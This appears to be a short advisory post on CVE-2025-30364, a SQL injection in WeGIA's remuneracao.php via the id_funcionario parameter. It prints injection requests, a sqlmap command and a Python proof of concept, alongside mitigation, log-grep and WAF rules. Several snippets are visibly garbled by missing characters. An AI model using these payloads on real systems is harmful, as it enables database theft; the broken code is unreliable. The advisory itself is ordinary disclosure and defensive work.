Listen to this Post
How CVE-2025-30364 Works
The vulnerability exists in WeGIA’s `/WeGIA/html/funcionario/remuneracao.php` endpoint, where the `id_funcionario` parameter lacks proper input sanitization. Attackers can inject malicious SQL queries through this parameter, manipulating database operations. Since no prepared statements or input validation are applied, arbitrary SQL commands execute with database privileges. This allows data theft, modification, or deletion. The flaw stems from direct concatenation of user input into SQL queries.
DailyCVE Form
Platform: WeGIA
Version: <3.2.8
Vulnerability: SQL Injection
Severity: Critical
Date: 04/10/2025
What Undercode Say:
Exploitation:
GET /WeGIA/html/funcionario/remuneracao.php?id_funcionario=1' UNION SELECT 1,2,3,user(),5-- - HTTP/1.1 Host: target.com
Detection:
sqlmap -u "http://target.com/WeGIA/html/funcionario/remuneracao.php?id_funcionario=1" --risk=3 --level=5
Mitigation:
1. Update to WeGIA 3.2.8.
2. Apply prepared statements:
$stmt = $conn->prepare("SELECT FROM remuneracao WHERE id_funcionario = ?");
$stmt->bind_param("i", $id_funcionario);
Log Analysis:
grep -E "remuneracao.php.id_funcionario=[^0-9]" /var/log/nginx/access.log
WAF Rule:
SecRule ARGS_GET:id_funcionario "@detectSQLi" "id:1001,deny,status:403"
Database Hardening:
REVOKE DELETE, DROP ON wegia_db. FROM 'app_user'@'%';
Exploit PoC:
import requests
url = "http://target.com/WeGIA/html/funcionario/remuneracao.php"
payload = "1' AND (SELECT 1 FROM(SELECT COUNT(),CONCAT(user(),0x3a,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)y)-- -"
r = requests.get(url, params={"id_funcionario": payload})
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-30364
Extra Source Hub:
Undercode
